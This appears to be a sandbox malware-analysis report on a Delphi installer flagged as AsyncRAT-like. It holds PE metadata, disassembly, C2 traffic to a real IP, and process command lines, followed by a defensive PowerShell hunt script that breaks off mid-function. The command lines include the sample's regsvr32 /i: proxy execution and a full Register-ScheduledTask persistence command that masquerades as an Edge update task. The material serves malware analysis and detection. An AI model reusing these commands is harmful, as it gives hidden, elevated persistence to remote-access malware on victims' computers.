                                                                            Entrypoint:0x416478
                                                                            Entrypoint Section:.itext
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x457CA289 [Mon Dec 11 00:12:57 2006 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:0
                                                                            File Version Major:5
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:483f0c4259a9148c34961abbda6146c1
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            add esp, FFFFFFA4h
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor eax, eax
                                                                            mov dword ptr [ebp-3Ch], eax
                                                                            mov dword ptr [ebp-40h], eax
                                                                            mov dword ptr [ebp-5Ch], eax
                                                                            mov dword ptr [ebp-30h], eax
                                                                            mov dword ptr [ebp-38h], eax
                                                                            mov dword ptr [ebp-34h], eax
                                                                            mov dword ptr [ebp-2Ch], eax
                                                                            mov dword ptr [ebp-28h], eax
                                                                            mov dword ptr [ebp-14h], eax
                                                                            mov eax, 004152B8h
                                                                            call 00007F85DC5EA0D1h
                                                                            xor eax, eax
                                                                            push ebp
                                                                            push 00416B45h
                                                                            push dword ptr fs:[eax]
                                                                            mov dword ptr fs:[eax], esp
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 00416B01h
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            mov eax, dword ptr [0041AB48h]
                                                                            call 00007F85DC5F897Bh
                                                                            call 00007F85DC5F8522h
                                                                            lea edx, dword ptr [ebp-14h]
                                                                            xor eax, eax
                                                                            call 00007F85DC5F21A4h
                                                                            mov edx, dword ptr [ebp-14h]
                                                                            mov eax, 0041D6E8h
                                                                            call 00007F85DC5E8707h
                                                                            push 00000002h
                                                                            push 00000000h
                                                                            push 00000001h
                                                                            mov ecx, dword ptr [0041D6E8h]
                                                                            mov dl, 01h
                                                                            mov eax, dword ptr [0040F080h]
                                                                            call 00007F85DC5F2A8Fh
                                                                            mov dword ptr [0041D6ECh], eax
                                                                            xor edx, edx
                                                                            push ebp
                                                                            push 00416AADh
                                                                            push dword ptr fs:[edx]
                                                                            mov dword ptr fs:[edx], esp
                                                                            call 00007F85DC5F8A03h
                                                                            mov dword ptr [0041D6F4h], eax
                                                                            mov eax, dword ptr [0041D6F4h]
                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                            jne 00007F85DC5F9D6Ah
                                                                            mov eax, dword ptr [0041D6F4h]
                                                                            mov edx, 00000028h
                                                                            call 00007F85DC5F2F58h
                                                                            mov edx, dword ptr [0041D6F4h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1e000 | 0xf9e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x21000 | 0x102d4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x20000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1e350 | 0x24c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x143f8 | 0x14400 | c9bb3afc1ceaaa31127ccfa204c657ef | False | 0.5487316743827161 | data | 6.482216817915366 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x16000 | 0xbe8 | 0xc00 | 1ba5adf2e1058c0460dcc814ba86fb32 | False | 0.6246744791666666 | data | 6.005798728198158 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x17000 | 0xd9c | 0xe00 | d5b22eff9e08edaa95f493c1a71158c0 | False | 0.2924107142857143 | data | 2.669288666959085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x18000 | 0x574c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x1e000 | 0xf9e | 0x1000 | b47eaca4c149ee829de76a342b5560d5 | False | 0.35595703125 | data | 4.9677831942996935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x1f000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x20000 | 0x18 | 0x200 | 3746f5876803f8f30db5bb2deb8772ae | False | 0.05078125 | data | 0.190488766434666 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x21000 | 0x102d4 | 0x10400 | fe2478415e1581a70914dfc06f95f5e6 | False | 0.30955528846153846 | data | 5.124529477041404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x2150c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.23902439024390243
RT_ICON | 0x21b74 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.38306451612903225
RT_ICON | 0x21e5c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.597972972972973
RT_ICON | 0x21f84 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.6084754797441365
RT_ICON | 0x22e2c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.8172382671480144
RT_ICON | 0x236d4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.7276011560693642
RT_ICON | 0x23c3c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.4179460580912863
RT_ICON | 0x261e4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.6719043151969981
RT_ICON | 0x2728c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.8315602836879432
RT_STRING | 0x276f4 | 0xc4 | data | | | 0.5969387755102041
RT_STRING | 0x277b8 | 0xcc | data | | | 0.6225490196078431
RT_STRING | 0x27884 | 0x174 | data | | | 0.5510752688172043
RT_STRING | 0x279f8 | 0x39c | data | | | 0.34523809523809523
RT_STRING | 0x27d94 | 0x34c | data | | | 0.4218009478672986
RT_STRING | 0x280e0 | 0x294 | data | | | 0.4106060606060606
RT_RCDATA | 0x28374 | 0x82e8 | data | English | United States | 0.11261637622344235
RT_RCDATA | 0x3065c | 0x10 | data | | | 1.5
RT_RCDATA | 0x3066c | 0x1a0 | data | | | 0.8149038461538461
RT_RCDATA | 0x3080c | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x30838 | 0x84 | data | English | United States | 0.6363636363636364
RT_VERSION | 0x308bc | 0x4b8 | COM executable for DOS | English | United States | 0.2855960264900662
RT_MANIFEST | 0x30d74 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dll | WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
advapi32.dll | AdjustTokenPrivileges
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-02T14:08:46.826838+0100 | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | 1 | 144.202.34.112 | 56001 | 192.168.11.20 | 49715 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 14:08:46.232553005 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:08:46.362107038 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:08:46.362247944 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:08:46.368822098 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:08:46.552822113 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:08:46.552985907 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:08:46.690830946 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:08:46.690875053 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:08:46.691028118 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:08:46.695679903 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:08:46.826838017 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:08:46.880090952 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:08:50.261701107 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:08:50.443298101 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:08:50.443458080 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:08:50.615226030 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:12.303415060 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:12.474508047 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:12.474656105 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:12.605123997 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:12.655550003 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:12.784842014 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:12.827424049 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:12.893112898 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:13.068484068 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:13.068698883 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:13.240334988 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:13.506438971 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:13.561585903 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:13.691083908 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:13.733429909 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:37.244111061 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:37.428252935 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:37.428437948 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:37.558715105 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:37.603097916 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:37.732326031 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:37.733565092 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:37.912255049 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:37.912426949 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:38.084132910 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:40.522288084 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:40.571211100 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:09:40.701056957 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:09:40.743068933 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:02.245826006 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:02.428184986 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:02.428296089 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:02.558981895 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:02.613110065 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:02.742500067 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:02.744044065 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:02.927911997 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:02.928076029 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:03.099744081 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:07.537826061 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:07.580729008 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:07.710082054 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:07.752602100 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:08.218152046 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:08.396615982 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:08.396719933 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:08.527384996 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:08.580543041 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:08.710041046 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:08.710722923 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:08.881006002 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Jan 2, 2025 14:10:08.881196022 CET | 49715 | 56001 | 192.168.11.20 | 144.202.34.112
Jan 2, 2025 14:10:09.052891016 CET | 56001 | 49715 | 144.202.34.112 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 14:08:33.966959953 CET | 1.1.1.1 | 192.168.11.20 | 0x9904 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 14:08:33.966959953 CET | 1.1.1.1 | 192.168.11.20 | 0x9904 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false


                                                                            Target ID:0
                                                                            Start time:08:08:00
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\Desktop\8n26gvrXUM.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\8n26gvrXUM.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'479'422 bytes
                                                                            MD5 hash:C6F9F0EC394A72FB302EFBCF74DA2EA7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:08:08:00
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp" /SL5="$103F0,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'181'184 bytes
                                                                            MD5 hash:BCC236A3921E1388596A42B05686FF5E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Antivirus matches:
                                                                            • Detection: 3%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:08:08:01
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                            Imagebase:0x30000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:08:08:01
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6fe510000
                                                                            File size:875'008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:08:08:01
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /T 3
                                                                            Imagebase:0xba0000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\Desktop\8n26gvrXUM.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                            Imagebase:0x400000
                                                                            File size:1'479'422 bytes
                                                                            MD5 hash:C6F9F0EC394A72FB302EFBCF74DA2EA7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /SL5="$30432,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                            Imagebase:0x400000
                                                                            File size:1'181'184 bytes
                                                                            MD5 hash:BCC236A3921E1388596A42B05686FF5E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Antivirus matches:
                                                                            • Detection: 3%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
                                                                            Imagebase:0x940000
                                                                            File size:20'992 bytes
                                                                            MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
                                                                            Imagebase:0x7ff7b33d0000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
                                                                            Imagebase:0x7ff74c1f0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:08:08:04
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6fe510000
                                                                            File size:875'008 bytes
                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:12
                                                                            Start time:08:08:10
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
                                                                            Imagebase:0x7ff74c1f0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true
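The two PowerShell command lines above are the persistence mechanism in full: Target 10 asks Get-ScheduledTask whether a task already runs regsvr32 /S /i:SYNC on the dropped %APPDATA%\netapi32_1.drv, and Target 12 registers that task under a name modelled on the real Edge updater task, with -RunLevel Highest, no execution time limit and a one-minute repetition. The hunt script below is an added example written for this report; it is not part of the Joe Sandbox output and not code from the sample. It inverts the sample's own check and broadens it into a sweep of every registered task. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later); the LOLBin list, the user-writable path pattern, the five-minute repetition threshold and the Edge-updater name and path patterns are my own assumptions, not values taken from the report.

```powershell
# Added hunt script for the scheduled-task persistence seen in this report.
# Not part of the Joe Sandbox output or of the sample. Assumes the
# ScheduledTasks module (Windows 8 / Server 2012 and later); the lists and
# thresholds below are my own assumptions, not values from the report.

# Binaries that legitimately run from tasks but are also classic proxies for
# attacker code. The sample uses regsvr32 /i:, which calls the DllInstall
# export of whatever file is named, whatever its extension.
$Lolbins = @('regsvr32', 'rundll32', 'mshta', 'powershell', 'pwsh', 'cmd',
             'wscript', 'cscript', 'msiexec', 'certutil')

# Directories a standard user can write to. A Highest-privilege task whose
# payload lives here is the pattern in this report (%APPDATA%\netapi32_1.drv).
$UserWritable = '(?i)\\(AppData|ProgramData|Temp|Users\\[^\\]+\\(Desktop|Downloads|Documents))\\'

# The genuine MicrosoftEdgeUpdateTaskMachine* tasks run MicrosoftEdgeUpdate.exe
# from the EdgeUpdate folder (assumed expected location); anything else under
# that name is a look-alike.
$EdgeTaskName    = '(?i)^MicrosoftEdgeUpdateTask'
$EdgeUpdaterPath = '(?i)\\EdgeUpdate\\MicrosoftEdgeUpdate\.exe$'

function Find-SuspiciousScheduledTask {
    [CmdletBinding()]
    param(
        [Parameter(ValueFromPipeline = $true)]
        $Task,                        # MSFT_ScheduledTask from Get-ScheduledTask
        [int] $MaxRepeatMinutes = 5   # repetition at or below this is beacon-like
    )
    process {
        $reasons  = [System.Collections.Generic.List[string]]::new()
        $elevated = ($Task.Principal.RunLevel -eq 'Highest')

        foreach ($action in $Task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe       = [System.IO.Path]::GetFileName($action.Execute) -replace '(?i)\.exe$', ''
            $argString = [string]$action.Arguments

            if ($Lolbins -contains $exe -and $argString -match $UserWritable) {
                $reasons.Add("$exe launched with an argument under a user-writable path")
            }
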